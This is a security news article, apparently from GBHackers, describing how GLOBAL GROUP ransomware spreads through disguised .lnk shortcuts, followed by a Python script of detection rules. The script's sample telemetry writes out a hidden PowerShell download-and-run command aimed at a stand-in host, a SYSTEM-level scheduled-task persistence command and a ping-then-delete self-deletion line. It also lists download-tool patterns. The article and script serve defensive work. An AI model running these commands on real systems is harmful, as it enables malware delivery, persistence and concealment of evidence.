GBHackers

Attackers Weaponize Windows Shortcut Files to Deploy Global Group Ransomware


A high-volume phishing campaign leveraging the Phorpiex botnet has been distributing GLOBAL GROUP ransomware through weaponized Windows shortcut files.

The attack begins with an email attachment named Document.doc.lnk. Windows’ default behavior of hiding known file extensions makes this shortcut appear as a legitimate Word document to unsuspecting users.

Attackers enhance deception by borrowing icons from Windows system files, such as shell32.dll, creating a familiar visual cue that reduces hesitation before clicking.

When opened, the shortcut silently launches cmd.exe in the background, which then invokes PowerShell to download a second-stage payload from a remote server.

Security researchers recently identified emails with the subject line “Your Document”, a phrase that has dominated large-scale campaigns throughout 2024 and 2025, containing malicious .lnk attachments designed to bypass user suspicion.

By combining social engineering, stealthy execution, and Living-off-the-Land (LotL) techniques, the file silently retrieves and launches a second-stage payload without raising suspicion.

Attack chain (Source: Forcepoint).

The malicious file, named windrv.exe to resemble a legitimate Windows driver, is saved to the victim’s system and executed automatically, all without visible warnings or installation prompts.

GLOBAL GROUP Threat

GLOBAL GROUP ransomware represents a concerning evolution in ransomware design. Unlike traditional variants that communicate with command-and-control servers, this ransomware operates entirely offline in “mute” mode.


Command prompt launches PowerShell (Source: Forcepoint).

It generates encryption keys locally on the infected machine, meaning it can function in air-gapped or isolated environments where network monitoring would typically detect suspicious activity.

The ransomware encrypts files using the robust ChaCha20-Poly1305 algorithm, appending the .Reco extension to them.

This encryption method includes authentication features that prevent tampering, making decryption impossible without the attacker’s private key. Previous decryption tools for similar malware families are ineffective against GLOBAL GROUP.

GLOBAL GROUP employs sophisticated techniques to avoid detection and maximize damage. It checks for virtualized environments and analysis tools commonly used by security researchers, allowing it to evade sandbox detection.

It uses Task Scheduler to create a task named “CoolTask” that executes at system startup with SYSTEM privileges, and then triggers it immediately.


Cleanup module strings (Source: Forcepoint).

The malware terminates database processes to unlock files for encryption and uses a ping command as a timer before deleting itself from disk to hinder forensic investigation.

The ransomware establishes persistence through Windows services and scheduled tasks, while its lateral movement capabilities enable it to spread across networks.

Detection Indicators

Infected systems display telltale signs including a changed desktop wallpaper announcing the GLOBAL GROUP compromise, encrypted files with the .Reco extension, and README.Reco.txt ransom notes directing victims to a Tor-based payment site.

GLOBAL GROUP file marker (Source: Forcepoint).

Technical indicators include the mutex “GlobalFxo16jmdgujs437” and a unique file marker “xcrydtednotstill_amazingg_time!!” visible in hex editors.

Its lateral movement involves querying Active Directory and creating services on remote machines. It can even clear event logs to conceal its activities.

This campaign highlights why shortcut files remain effective attack vectors and underscores the limitations of network-based detection alone.

Organizations should prioritize endpoint behavior monitoring, turn off automatic execution of shortcut files from email attachments, and ensure file extensions are visible in Windows Explorer.
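One way to put that endpoint behaviour monitoring into practice, as an added example rather than code from Forcepoint or GBHackers: the script below runs three rules over constructed Sysmon-style process-creation records modelled on the chain described above (an Explorer-spawned cmd.exe handing off to a downloading PowerShell, the SYSTEM-level “CoolTask”, and the ping-then-delete cleanup). The exact command lines, the use of schtasks.exe for the task, and the victim path are assumptions, not observed samples.

```python
"""Behavioural triage of process-creation telemetry for the .lnk -> cmd.exe ->
PowerShell -> windrv.exe chain described above. Added example, not code from
Forcepoint or GBHackers. The events are constructed Sysmon-style records and the
exact command lines are assumptions modelled on the article, not observed samples."""
import re

TEMP = r"C:\Users\alice\AppData\Local\Temp"  # constructed victim path (assumption)

# Constructed sample telemetry; field names follow Sysmon Event ID 1.
EVENTS = [
    # Stage 1: the shortcut (run by Explorer) starts cmd.exe, which calls PowerShell.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'/c powershell -w hidden -c "iwr http://example.invalid/windrv.exe '
                    f'-OutFile {TEMP}\\windrv.exe; & {TEMP}\\windrv.exe"'},
    # Stage 2: persistence via a startup task named CoolTask running as SYSTEM.
    {"ParentImage": f"{TEMP}\\windrv.exe", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": f"/create /tn CoolTask /sc onstart /ru SYSTEM /tr {TEMP}\\windrv.exe /f"},
    # Cleanup: ping as a timer, then self-deletion from disk.
    {"ParentImage": f"{TEMP}\\windrv.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'/c ping 127.0.0.1 -n 5 > nul & del /f /q "{TEMP}\\windrv.exe"'},
    # Benign: a real Word document opened from Explorer.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'/n "C:\Users\alice\Downloads\Document.doc"'},
]

def _is(e, key, name):
    """True when the image path in field `key` ends with `\\<name>` (case-insensitive)."""
    return e[key].lower().endswith("\\" + name)

DOWNLOAD = r"iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|bitsadmin|https?://"

RULES = [
    # Explorer-spawned cmd.exe handing off to a downloading PowerShell: the .lnk
    # never shows up as a process image, so the parent/child pair is the signal.
    ("lnk_cmd_powershell_download", lambda e: _is(e, "ParentImage", "explorer.exe")
     and _is(e, "Image", "cmd.exe") and re.search(r"powershell", e["CommandLine"], re.I)
     and re.search(DOWNLOAD, e["CommandLine"], re.I)),
    # Scheduled task "CoolTask" created to run as SYSTEM (assumes schtasks.exe is used).
    ("cooltask_system_persistence", lambda e: _is(e, "Image", "schtasks.exe")
     and re.search(r"/create\b.*/tn\s+\"?CoolTask\b", e["CommandLine"], re.I)
     and re.search(r"/ru\s+\"?(NT AUTHORITY\\)?SYSTEM\b", e["CommandLine"], re.I)),
    # "ping ... & del" self-deletion timer in a single cmd.exe command line.
    ("ping_timer_self_delete", lambda e: _is(e, "Image", "cmd.exe")
     and re.search(r"\bping\b.*&\s*del\b", e["CommandLine"], re.I)),
]

def triage(events):
    """Return (rule_name, event_index) pairs for every rule each event trips."""
    return [(name, i) for i, e in enumerate(events) for name, pred in RULES if pred(e)]
```

Feed real Sysmon or EDR process-creation records into `triage` with the same three field names; the benign WINWORD.EXE launch is there to show the rules do not fire on an ordinary document open.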

Regular offline backups remain the most reliable defense against ransomware that operates without network connectivity.
